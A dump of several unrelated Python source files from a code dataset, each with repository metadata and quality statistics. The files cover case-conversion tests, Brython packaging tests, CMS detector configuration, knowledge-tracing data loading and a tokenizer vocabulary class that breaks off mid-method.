# print('total: ', len(response['hits']['hits']))
for vol in response['hits']['hits']:
obj_id = vol['_id']
print('vol. ', vol['_source']['id'])
if 'pieces' not in vol['_source']:
continue
pieces = vol['_source']['pieces']
# count = 0
for i in range(len(pieces)):
if pieces[i].get('qq_sim', 0) < 0.70 and pieces[i].get('ne_sim', 0) <= 0.70:
title = pieces[i]['title']
album = pieces[i]['album']
artist = pieces[i]['artist']
print('%s: %s, %s, %s, %s: %s, %s: %s' % (pieces[i]['id'], title, album, artist,
pieces[i].get('qq_id', None), pieces[i].get('qq_sim', 0),
pieces[i].get('ne_id', None), pieces[i].get('ne_sim', 0)))
global count
count += 1
count = 0
if __name__ == '__main__':
# insert_qq(901, 1000)
# bp = [0, 100, 200, 300, 400, 500, 600, 700, 750]
# for l, r in zip(bp, bp[1:]):
# insert_qq_again(l+1, r)
# insert_qq_again(751, 800)
bp = list(range(0, 1100, 100))
for l, r in zip(bp, bp[1:]):
miss_stat(l, r)
print('total: ', count)
| 31.038961 | 110 | 0.447699 | 568 | 4,780 | 3.626761 | 0.177817 | 0.078155 | 0.017476 | 0.017476 | 0.808738 | 0.793204 | 0.773301 | 0.752913 | 0.719417 | 0.719417 | 0 | 0.034223 | 0.388703 | 4,780 | 153 | 111 | 31.24183 | 0.670773 | 0.043933 | 0 | 0.747967 | 0 | 0.00813 | 0.114743 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02439 | false | 0 | 0.01626 | 0 | 0.04065 | 0.073171 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c62b2ec776685e4ae7f491f3a5a4c6eaa782f43e | 107 | py | Python | models/__init__.py | v-wewei/Relation-Shape-CNN | 04c114d6eaf981736721f0013dab4fc3c91ae05f | [
"MIT"
] | 421 | 2019-04-17T01:52:40.000Z | 2022-03-23T09:42:54.000Z | models/__init__.py | v-wewei/Relation-Shape-CNN | 04c114d6eaf981736721f0013dab4fc3c91ae05f | [
"MIT"
] | 45 | 2019-04-19T02:35:53.000Z | 2022-02-15T10:18:17.000Z | models/__init__.py | v-wewei/Relation-Shape-CNN | 04c114d6eaf981736721f0013dab4fc3c91ae05f | [
"MIT"
] | 84 | 2019-04-17T16:20:45.000Z | 2022-03-29T07:55:18.000Z | from .rscnn_ssn_cls import RSCNN_SSN as RSCNN_SSN_Cls
from .rscnn_msn_seg import RSCNN_MSN as RSCNN_MSN_Seg | 53.5 | 53 | 0.878505 | 22 | 107 | 3.818182 | 0.363636 | 0.285714 | 0.261905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102804 | 107 | 2 | 54 | 53.5 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c63416b41c3122f5ff44d89195836e332cca830e | 153 | py | Python | func_packages/Snowboy/main.py | zhetengtiao/RingRobotX | 59daa1ec1ebcaa2285a43bc947fbb201577e1cbf | [
"Apache-2.0"
] | null | null | null | func_packages/Snowboy/main.py | zhetengtiao/RingRobotX | 59daa1ec1ebcaa2285a43bc947fbb201577e1cbf | [
"Apache-2.0"
] | null | null | null | func_packages/Snowboy/main.py | zhetengtiao/RingRobotX | 59daa1ec1ebcaa2285a43bc947fbb201577e1cbf | [
"Apache-2.0"
] | null | null | null | import model.hook
import func_packages.Snowboy.snowboymain
model.hook.add_hook_fast("RRCore.Main.Before.Running",func_packages.Snowboy.snowboymain.run)
| 30.6 | 92 | 0.856209 | 22 | 153 | 5.772727 | 0.636364 | 0.141732 | 0.299213 | 0.472441 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039216 | 153 | 4 | 93 | 38.25 | 0.863946 | 0 | 0 | 0 | 0 | 0 | 0.169935 | 0.169935 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c658e25525cb1225ebec1eee2a924886e523781d | 2,781 | py | Python | DPGAnalysis/SiStripTools/python/configurableapvcyclephaseproducer_GR09_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | DPGAnalysis/SiStripTools/python/configurableapvcyclephaseproducer_GR09_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | DPGAnalysis/SiStripTools/python/configurableapvcyclephaseproducer_GR09_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
APVPhases = cms.EDProducer('ConfigurableAPVCyclePhaseProducer',
defaultPartitionNames = cms.vstring("TI_13-JUN-2009_1",
"TO_30-JUN-2009_1",
"TP_09-JUN-2009_1",
"TM_09-JUN-2009_1"
),
defaultPhases = cms.vint32(-1,-1,-1,-1),
runPhases = cms.VPSet(
cms.PSet( runNumber = cms.int32(100967),phases = cms.untracked.vint32(30),partitions = cms.untracked.vstring("TM_09-JUN-2009_1")),
cms.PSet( runNumber = cms.int32(100995),phases = cms.untracked.vint32(30),partitions = cms.untracked.vstring("TM_09-JUN-2009_1")),
cms.PSet( runNumber = cms.int32(101012),phases = cms.untracked.vint32(30),partitions = cms.untracked.vstring("TM_09-JUN-2009_1")),
cms.PSet( runNumber = cms.int32(101018),phases = cms.untracked.vint32(30),partitions = cms.untracked.vstring("TM_09-JUN-2009_1")),
cms.PSet( runNumber = cms.int32(101043),phases = cms.untracked.vint32(30),partitions = cms.untracked.vstring("TM_09-JUN-2009_1")),
cms.PSet( runNumber = cms.int32(101045),phases = cms.untracked.vint32(30),partitions = cms.untracked.vstring("TM_09-JUN-2009_1")),
cms.PSet( runNumber = cms.int32(102130),phases = cms.untracked.vint32(30),partitions = cms.untracked.vstring("TM_09-JUN-2009_1")),
cms.PSet( runNumber = cms.int32(102169),phases = cms.untracked.vint32(30),partitions = cms.untracked.vstring("TM_09-JUN-2009_1")),
cms.PSet( runNumber = cms.int32(105612),phases = cms.untracked.vint32(-1,-1,-1,-1)),
cms.PSet( runNumber = cms.int32(105755),phases = cms.untracked.vint32(30,30,30,30)),
cms.PSet( runNumber = cms.int32(105765),phases = cms.untracked.vint32(30,30,30,30)),
cms.PSet( runNumber = cms.int32(105820),phases = cms.untracked.vint32(30,30,30,30)),
cms.PSet( runNumber = cms.int32(106019),phases = cms.untracked.vint32(30,30,30,30)),
cms.PSet( runNumber = cms.int32(108219),phases = cms.untracked.vint32(30,30,30,30)),
cms.PSet( runNumber = cms.int32(108239),phases = cms.untracked.vint32(30,30,30,30))
)
)
| 99.321429 | 161 | 0.518519 | 301 | 2,781 | 4.710963 | 0.152824 | 0.19464 | 0.169252 | 0.200987 | 0.789845 | 0.751058 | 0.733427 | 0.733427 | 0.71086 | 0.71086 | 0 | 0.170637 | 0.350953 | 2,781 | 27 | 162 | 103 | 0.614958 | 0 | 0 | 0 | 0 | 0 | 0.080906 | 0.011866 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 0.038462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d67085db6dc31bc519b807f85c23c4d0d9e05ff6 | 101 | py | Python | res_mods/configs/xvm/py_macro/str.py | peterbartha/ImmunoMod | cbf8cd49893d7082a347c1f72c0e39480869318a | [
"MIT"
] | null | null | null | res_mods/configs/xvm/py_macro/str.py | peterbartha/ImmunoMod | cbf8cd49893d7082a347c1f72c0e39480869318a | [
"MIT"
] | 1 | 2016-04-03T13:31:39.000Z | 2016-04-03T16:48:26.000Z | res_mods/configs/xvm/py_macro/str.py | peterbartha/ImmunoMod | cbf8cd49893d7082a347c1f72c0e39480869318a | [
"MIT"
] | null | null | null | @xvm.export('replace')
def str_replace(str, old, new, max=-1):
return str.replace(old, new, max)
| 25.25 | 39 | 0.673267 | 17 | 101 | 3.941176 | 0.588235 | 0.298507 | 0.268657 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011494 | 0.138614 | 101 | 3 | 40 | 33.666667 | 0.758621 | 0 | 0 | 0 | 0 | 0 | 0.069307 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
d69be239e8d08f7f57cbcee6c179421233bd9898 | 7,959 | py | Python | caseconverter/caseconverter_test.py | chrisdoherty4/python-case-converter | fc513efd069848cf5cc9323a98b0b4ee6171ca5e | [
"MIT"
] | 8 | 2021-01-14T20:08:14.000Z | 2022-03-08T12:08:24.000Z | caseconverter/caseconverter_test.py | chrisdoherty4/python-case-converter | fc513efd069848cf5cc9323a98b0b4ee6171ca5e | [
"MIT"
] | 5 | 2021-09-06T23:23:23.000Z | 2022-03-29T12:08:28.000Z | caseconverter/caseconverter_test.py | chrisdoherty4/python-case-converter | fc513efd069848cf5cc9323a98b0b4ee6171ca5e | [
"MIT"
] | null | null | null | import pytest
from .caseconverter import *
@pytest.mark.parametrize(
"input, output",
[
# With punctuation.
("Hello, world!", "helloWorld"),
# Camel cased
("helloWorld", "helloWorld"),
# Joined by delimeter.
("Hello-World", "helloWorld"),
# Cobol cased
("HELLO-WORLD", "helloWorld"),
# Without punctuation.
("Hello world", "helloWorld"),
# Repeating single delimeter
("Hello World", "helloWorld"),
# Repeating delimeters of different types
("Hello -__ World", "helloWorld"),
# Wrapped in delimeter
(" hello world ", "helloWorld"),
# End in capital letter
("hellO", "hellO"),
# Long sentence with punctuation
(
r"the quick !b@rown fo%x jumped over the laZy Do'G",
"theQuickBrownFoxJumpedOverTheLaZyDoG",
),
# Alternating character cases
("heLlo WoRld", "heLloWoRld"),
],
)
def test_camel_with_default_args(input, output):
assert camelcase(input) == output
@pytest.mark.parametrize(
"input, output",
[
# With punctuation.
("Hello, world!", "HELLO-WORLD"),
# Camel cased
("helloWorld", "HELLO-WORLD"),
# Joined by delimeter.
("Hello-World", "HELLO-WORLD"),
# Cobol cased
("HELLO-WORLD", "HELLO-WORLD"),
# Without punctuation.
("Hello world", "HELLO-WORLD"),
# Repeating single delimeter
("Hello World", "HELLO-WORLD"),
# Repeating delimeters of different types
("Hello -__ World", "HELLO-WORLD"),
# Wrapped in delimeter
(" hello world ", "HELLO-WORLD"),
# End in capital letter
("hellO", "HELL-O"),
# Long sentence with punctuation
(
r"the quick !b@rown fo%x jumped over the laZy Do'G",
"THE-QUICK-BROWN-FOX-JUMPED-OVER-THE-LA-ZY-DO-G",
),
# Alternating character cases
("heLlo WoRld", "HE-LLO-WO-RLD"),
],
)
def test_cobol_with_default_args(input, output):
assert cobolcase(input) == output
@pytest.mark.parametrize(
"input, output",
[
# With punctuation.
("Hello, world!", "HELLO_WORLD"),
# Camel cased
("helloWorld", "HELLO_WORLD"),
# Joined by delimeter.
("Hello-World", "HELLO_WORLD"),
# Cobol cased
("HELLO-WORLD", "HELLO_WORLD"),
# Without punctuation.
("Hello world", "HELLO_WORLD"),
# Repeating single delimeter
("Hello World", "HELLO_WORLD"),
# Repeating delimeters of different types
("Hello -__ World", "HELLO_WORLD"),
# Wrapped in delimeter
(" hello world ", "HELLO_WORLD"),
# End in capital letter
("hellO", "HELL_O"),
# Long sentence with punctuation
(
r"the quick !b@rown fo%x jumped over the laZy Do'G",
"THE_QUICK_BROWN_FOX_JUMPED_OVER_THE_LA_ZY_DO_G",
),
# Alternating character cases
("heLlo WoRld", "HE_LLO_WO_RLD"),
],
)
def test_macro_with_default_args(input, output):
assert macrocase(input) == output
@pytest.mark.parametrize(
"input, output",
[
# With punctuation.
("Hello, world!", "hello_world"),
# Camel cased
("helloWorld", "hello_world"),
# Joined by delimeter.
("Hello-World", "hello_world"),
# Cobol cased
("HELLO-WORLD", "hello_world"),
# Without punctuation.
("Hello world", "hello_world"),
# Repeating single delimeter
("Hello World", "hello_world"),
# Repeating delimeters of different types
("Hello -__ World", "hello_world"),
# Wrapped in delimeter
(" hello world ", "hello_world"),
# End in capital letter
("hellO", "hell_o"),
# Long sentence with punctuation
(
r"the quick !b@rown fo%x jumped over the laZy Do'G",
"the_quick_brown_fox_jumped_over_the_la_zy_do_g",
),
# Alternating character cases
("heLlo WoRld", "he_llo_wo_rld"),
],
)
def test_snake_with_default_args(input, output):
assert snakecase(input) == output
@pytest.mark.parametrize(
"input, output",
[
# With punctuation.
("Hello, world!", "HelloWorld"),
# Camel cased
("helloWorld", "HelloWorld"),
# Joined by delimeter.
("Hello-World", "HelloWorld"),
# Cobol cased
("HELLO-WORLD", "HelloWorld"),
# Without punctuation.
("Hello world", "HelloWorld"),
# Repeating single delimeter
("Hello World", "HelloWorld"),
# Repeating delimeters of different types
("Hello -__ World", "HelloWorld"),
# Wrapped in delimeter
(" hello world ", "HelloWorld"),
# End in capital letter
("hellO", "HellO"),
# Long sentence with punctuation
(
r"the quick !b@rown fo%x jumped over the laZy Do'G",
"TheQuickBrownFoxJumpedOverTheLaZyDoG",
),
# Alternating character cases
("heLlo WoRld", "HeLloWoRld"),
],
)
def test_pascal_with_default_args(input, output):
assert pascalcase(input) == output
@pytest.mark.parametrize(
"input, output",
[
# With punctuation.
("Hello, world!", "helloworld"),
# Camel cased
("helloWorld", "helloworld"),
# Joined by delimeter.
("Hello-World", "helloworld"),
# Cobol cased
("HELLO-WORLD", "helloworld"),
# Without punctuation.
("Hello world", "helloworld"),
# Repeating single delimeter
("Hello World", "helloworld"),
# Repeating delimeters of different types
("Hello -__ World", "helloworld"),
# Wrapped in delimeter
(" hello world ", "helloworld"),
# End in capital letter
("hellO", "hello"),
# Long sentence with punctuation
(
r"the quick !b@rown fo%x jumped over the laZy Do'G",
"thequickbrownfoxjumpedoverthelazydog",
),
# Alternating character cases
("heLlo WoRld", "helloworld"),
],
)
def test_flat_with_default_args(input, output):
assert flatcase(input) == output
@pytest.mark.parametrize(
"input, output",
[
# With punctuation.
("Hello, world!", "hello-world"),
# Camel cased
("helloWorld", "hello-world"),
# Joined by delimeter.
("Hello-World", "hello-world"),
# Cobol cased
("HELLO-WORLD", "hello-world"),
# Without punctuation.
("Hello world", "hello-world"),
# Repeating single delimeter
("Hello World", "hello-world"),
# Repeating delimeters of different types
("Hello -__ World", "hello-world"),
# Wrapped in delimeter
(" hello world ", "hello-world"),
# End in capital letter
("hellO", "hell-o"),
# Long sentence with punctuation
(
r"the quick !b@rown fo%x jumped over the laZy Do'G",
"the-quick-brown-fox-jumped-over-the-la-zy-do-g",
),
# Alternating character cases
("heLlo WoRld", "he-llo-wo-rld"),
],
)
def test_kebab_with_default_args(input, output):
assert kebabcase(input) == output
@pytest.mark.parametrize(
"input, output",
[
# With punctuation.
("Hell9o, world!", "hell9oWorld"),
("0Hello, world!", "0helloWorld"),
("Hello, world!0", "helloWorld0"),
],
)
def test_with_numbers(input, output):
assert camelcase(input) == output
@pytest.mark.parametrize(
"input, output",
[
# With punctuation.
("Hello, world!", "hello,World!"),
],
)
def test_no_strip_punctuation(input, output):
assert camelcase(input, strip_punctuation=False) == output
| 30.033962 | 64 | 0.562508 | 789 | 7,959 | 5.557668 | 0.108999 | 0.207526 | 0.099202 | 0.132269 | 0.940707 | 0.933637 | 0.886431 | 0.886431 | 0.886431 | 0.873204 | 0 | 0.001084 | 0.304561 | 7,959 | 264 | 65 | 30.147727 | 0.791147 | 0.226913 | 0 | 0.257485 | 0 | 0.011976 | 0.387947 | 0.048082 | 0 | 0 | 0 | 0 | 0.053892 | 1 | 0.053892 | false | 0 | 0.011976 | 0 | 0.065868 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ba855ea58adb20a0ef41d911689546b106b75c62 | 5,280 | py | Python | utils/data_helpers.py | shshen-closer/LPKT_tensorflow_version | 3236b005315bc8aca34ca31e60bb19bc566983a3 | [
"Apache-2.0"
] | 1 | 2022-03-29T06:47:15.000Z | 2022-03-29T06:47:15.000Z | utils/data_helpers.py | shshen-closer/LPKT_tensorflow_version | 3236b005315bc8aca34ca31e60bb19bc566983a3 | [
"Apache-2.0"
] | null | null | null | utils/data_helpers.py | shshen-closer/LPKT_tensorflow_version | 3236b005315bc8aca34ca31e60bb19bc566983a3 | [
"Apache-2.0"
] | null | null | null | # -*- coding:utf-8 -*-
__author__ = 'shshen'
import os
import random
import csv
import logging
import numpy as np
def logger_fn(name, input_file, level=logging.INFO):
tf_logger = logging.getLogger(name)
tf_logger.setLevel(level)
log_dir = os.path.dirname(input_file)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
fh = logging.FileHandler(input_file, mode='w')
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
tf_logger.addHandler(fh)
return tf_logger
def read_data_from_csv_file(fileName):
rows = []
max_skill_num = 0
max_num_problems = 116
with open(fileName, "r") as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
rows.append(row)
'''
for indx in range(0, len(rows)):
if (indx + 1 )% 3 == 0:
rand = random.randint(0, len(rows[indx]) - 1)
if int(rows[indx][rand]) == 1:
rows[indx][rand] = 0
if int(rows[indx][rand]) == 0:
rows[indx][rand] = 1
'''
index = 0
print ("the number of rows is " + str(len(rows)))
tuple_rows = []
#turn list to tuple
while(index < len(rows)-1):
problems_num = int(rows[index][0])
tmp_max_skill = max(map(int, rows[index+1]))
'''
cc = []
for item in rows[index+2]:
cc.append(int(item))
a_r = round(sum(cc) / problems_num, 2)
if a_r == 0.0 or a_r == 1.0:
index += 3
continue
'''
if(tmp_max_skill > max_skill_num):
max_skill_num = tmp_max_skill
if(problems_num <= 2):
index += 3
else:
if problems_num > max_num_problems:
count = problems_num // max_num_problems
iii = 0
while(iii <= count):
if iii != count:
tup = (max_num_problems, rows[index+1][iii * max_num_problems : (iii+1)*max_num_problems], rows[index+2][iii * max_num_problems : (iii+1)*max_num_problems])
elif problems_num - iii*max_num_problems > 2:
tup = (problems_num - iii*max_num_problems, rows[index+1][iii * max_num_problems : (iii+1)*max_num_problems], rows[index+2][iii * max_num_problems : (iii+1)*max_num_problems])
else:
break
tuple_rows.append(tup)
iii += 1
index += 3
else:
tup = (problems_num, rows[index+1], rows[index+2])
tuple_rows.append(tup)
index += 3
#shuffle the tuple
random.shuffle(tuple_rows)
print ("The number of students is ", len(tuple_rows))
print ("Finish reading data")
return tuple_rows, max_num_problems, max_skill_num+1
def read_test_data_from_csv_file(fileName):
rows = []
max_skill_num = 0
max_num_problems = 116
with open(fileName, "r") as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
rows.append(row)
'''
for indx in range(0, len(rows)):
if (indx + 1 )% 3 == 0:
rand = random.randint(0, len(rows[indx]) - 1)
if int(rows[indx][rand]) == 1:
rows[indx][rand] = 0
if int(rows[indx][rand]) == 0:
rows[indx][rand] = 1
'''
index = 0
print ("the number of rows is " + str(len(rows)))
tuple_rows = []
#turn list to tuple
while(index < len(rows)-1):
problems_num = int(rows[index][0])
tmp_max_skill = max(map(int, rows[index+1]))
'''
cc = []
for item in rows[index+2]:
cc.append(int(item))
a_r = round(sum(cc) / problems_num, 2)
if a_r == 0.0 or a_r == 1.0:
index += 3
continue
'''
if(tmp_max_skill > max_skill_num):
max_skill_num = tmp_max_skill
if(problems_num <= 2):
index += 3
else:
if problems_num > max_num_problems:
count = problems_num // max_num_problems
iii = 0
while(iii <= count):
if iii != count:
tup = (max_num_problems, rows[index+1][iii * max_num_problems : (iii+1)*max_num_problems], rows[index+2][iii * max_num_problems : (iii+1)*max_num_problems])
elif problems_num - iii*max_num_problems > 2:
tup = (problems_num - iii*max_num_problems, rows[index+1][iii * max_num_problems : (iii+1)*max_num_problems], rows[index+2][iii * max_num_problems : (iii+1)*max_num_problems])
else:
break
tuple_rows.append(tup)
iii += 1
index += 3
else:
tup = (problems_num, rows[index+1], rows[index+2])
tuple_rows.append(tup)
index += 3
#shuffle the tuple
# random.shuffle(tuple_rows)
print ("The number of students is ", len(tuple_rows))
print ("Finish reading data")
return tuple_rows, max_num_problems, max_skill_num+1
| 35.2 | 199 | 0.532386 | 692 | 5,280 | 3.851156 | 0.153179 | 0.067542 | 0.157599 | 0.076548 | 0.851782 | 0.851782 | 0.851782 | 0.851782 | 0.851782 | 0.851782 | 0 | 0.025203 | 0.346212 | 5,280 | 149 | 200 | 35.436242 | 0.746813 | 0.022159 | 0 | 0.791667 | 0 | 0 | 0.0453 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0 | 0.052083 | 0 | 0.114583 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ba8875cf74f5bed2f68e52cf007749b41c42093d | 3,935 | py | Python | tests/test_packdependencies.py | pylover/brythoncli | 4a4b43e1c407b32437c006ed9d6933b9ec3bb8fd | [
"MIT"
] | null | null | null | tests/test_packdependencies.py | pylover/brythoncli | 4a4b43e1c407b32437c006ed9d6933b9ec3bb8fd | [
"MIT"
] | null | null | null | tests/test_packdependencies.py | pylover/brythoncli | 4a4b43e1c407b32437c006ed9d6933b9ec3bb8fd | [
"MIT"
] | null | null | null | from os import path
from bddcli import status, stdout, stderr
def test_packdependencies_simple(app, tempstruct, here, sortlines):
temproot = tempstruct(**{
'foo': {
'__init__.py': 'i = 10',
'baz.py': 'i = 11',
},
'brython_stdlib.js': open(path.join(here, 'stuff/brython_stdlib.js'))
})
outfile = path.join(temproot, 'brython_modules.js')
with app(f'-C {temproot} pack-deps'):
assert stderr == ''
assert status == 0
assert sortlines(stdout) == sortlines('''\
Create brython_modules.js with all the modules used by the application
Finding packages...
Searching brython_stdlib.js...
''')
assert path.exists(outfile)
def test_packdependencies_outputdirextory(app, tempstruct, here, sortlines):
temproot = tempstruct(**{
'foo': {
'__init__.py': 'i = 10',
'baz.py': 'i = 11',
},
'brython_stdlib.js': open(path.join(here, 'stuff/brython_stdlib.js'))
})
destdir = tempstruct()
outfile = path.join(destdir, 'brython_modules.js')
with app(f'-C {temproot} pack-deps --output {destdir}'):
assert stderr == ''
assert status == 0
assert sortlines(stdout) == sortlines('''\
Create brython_modules.js with all the modules used by the application
Finding packages...
Searching brython_stdlib.js...
''')
assert path.exists(outfile)
def test_packdependencies_filename(app, tempstruct, here, sortlines):
temproot = tempstruct(**{
'foo': {
'__init__.py': 'i = 10',
'baz.py': 'import csv',
},
'brython_stdlib.js': open(path.join(here, 'stuff/brython_stdlib.js'))
})
outfile = path.join(temproot, 'libs.js')
with app(f'-C {temproot} pack-deps --filename libs.js'):
assert stderr == ''
assert status == 0
assert sortlines(stdout) == sortlines('''\
Create brython_modules.js with all the modules used by the application
Finding packages...
Searching brython_stdlib.js...
''')
assert path.exists(outfile)
with open(outfile) as f:
content = f.read()
assert 'csv' in content
def test_packdependencies_searchdirectory(app, tempstruct, here, sortlines):
temproot = tempstruct(**{
'foo': {
'__init__.py': 'i = 10',
'baz.py': 'i = 11',
},
'brython_stdlib.js': open(path.join(here, 'stuff/brython_stdlib.js'))
})
destdir = tempstruct()
outfile = path.join(destdir, 'brython_modules.js')
stdlib = temproot
with app(f'-C {destdir} deps --search {temproot}/foo --stdlib {stdlib}'):
print(stderr)
assert stderr == ''
assert status == 0
assert sortlines(stdout) == sortlines('''\
Create brython_modules.js with all the modules used by the application
Finding packages...
Searching brython_stdlib.js...
''')
assert path.exists(outfile)
def test_packdependencies_exclude(app, tempstruct, here, sortlines):
temproot = tempstruct(**{
'foo': {
'__init__.py': 'i = 10',
'baz.py': 'import colorsys',
},
'bar.py': 'import this',
'qux.py': 'import keyword',
'brython_stdlib.js': open(path.join(here, 'stuff/brython_stdlib.js'))
})
outfile = path.join(temproot, 'brython_modules.js')
with app(f'-C {temproot} deps --exclude bar.py'):
assert stderr == ''
assert status == 0
assert sortlines(stdout) == sortlines('''\
Create brython_modules.js with all the modules used by the application
Finding packages...
Searching brython_stdlib.js...
''')
assert path.exists(outfile)
with open(outfile) as f:
content = f.read()
# Do not search over big content.
assert len(content) < 3000
assert 'colorsys' in content
assert 'this' not in content
assert 'keyword' in content
| 31.230159 | 77 | 0.607624 | 454 | 3,935 | 5.147577 | 0.162996 | 0.08344 | 0.096277 | 0.068464 | 0.810869 | 0.810869 | 0.810869 | 0.810869 | 0.799315 | 0.799315 | 0 | 0.008509 | 0.253367 | 3,935 | 125 | 78 | 31.48 | 0.78693 | 0.007878 | 0 | 0.728972 | 0 | 0 | 0.341363 | 0.029472 | 0 | 0 | 0 | 0 | 0.233645 | 1 | 0.046729 | false | 0 | 0.056075 | 0 | 0.102804 | 0.009346 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
033e89f709bab5c283628e54240f94258598d7db | 23,208 | py | Python | src/utils/vocabulary.py | richardbaihe/robustLM | fb36aa08cd886ad98f431647d9cb128879bb4382 | [
"MIT"
] | 1 | 2022-03-21T15:12:58.000Z | 2022-03-21T15:12:58.000Z | src/utils/vocabulary.py | richardbaihe/robustLM | fb36aa08cd886ad98f431647d9cb128879bb4382 | [
"MIT"
] | null | null | null | src/utils/vocabulary.py | richardbaihe/robustLM | fb36aa08cd886ad98f431647d9cb128879bb4382 | [
"MIT"
] | null | null | null | import os
from collections import Counter, OrderedDict, defaultdict
import torch
import nltk
from nltk.corpus import wordnet as wn
from tokenizers import Tokenizer
class Vocab(object):
def __init__(self, special=[], min_freq=1, max_size=None, lower_case=True,
delimiter=None, vocab_file=None):
self.counter = Counter()
self.special = special
self.min_freq = min_freq
self.max_size = max_size
self.lower_case = lower_case
self.delimiter = delimiter
self.vocab_file = vocab_file
self.cl_root_tokens = []
self.cl_leaf_tokens = []
self.word2class = {}
self.class2words = defaultdict(list)
self.word2class_dict = defaultdict(dict)
def tokenize(self, line, add_eos=False, add_double_eos=False, add_sent_eos=False, char_level=False):
line = line.strip()
if char_level:
line = ' '.join([str(ord(c)) for c in line])
# convert to lower case
if self.lower_case:
line = line.lower()
# empty delimiter '' will evaluate False
if self.delimiter == '':
symbols = line
else:
symbols = line.split(self.delimiter)
if add_sent_eos:
symbols = symbols + ['<sent_eos>']
if add_double_eos: # lm1b
return ['<S>'] + symbols + ['<S>']
elif add_eos:
return symbols + ['<eos>']
else:
return symbols
def count_file(self, path, verbose=False, add_eos=False, sega=False, sent_eos=False, char_level=False):
if verbose:
print('counting file {} ...'.format(path))
assert os.path.exists(path)
with open(path, 'r', encoding='utf-8') as f:
for idx, line in enumerate(f):
if verbose and idx > 0 and idx % 500000 == 0:
print(' line {}'.format(idx))
if sega:
nltk_sents = nltk.tokenize.sent_tokenize(line)
for sent in nltk_sents:
symbols = self.tokenize(
sent, add_eos=add_eos, add_sent_eos=sent_eos, char_level=char_level)
self.counter.update(symbols)
else:
symbols = self.tokenize(
line, add_eos=add_eos, add_sent_eos=sent_eos, char_level=char_level)
self.counter.update(symbols)
def count_cl_file(self, path, verbose=False, add_eos=False, sega=False, sent_eos=False, char_level=False):
if verbose:
print('counting cl file {} ...'.format(path))
if not os.path.exists(path):
print("found no cl files to count")
return
temp_counter = Counter()
with open(path, 'r', encoding='utf-8') as f:
for idx, line in enumerate(f):
if verbose and idx > 0 and idx % 500000 == 0:
print(' line {}'.format(idx))
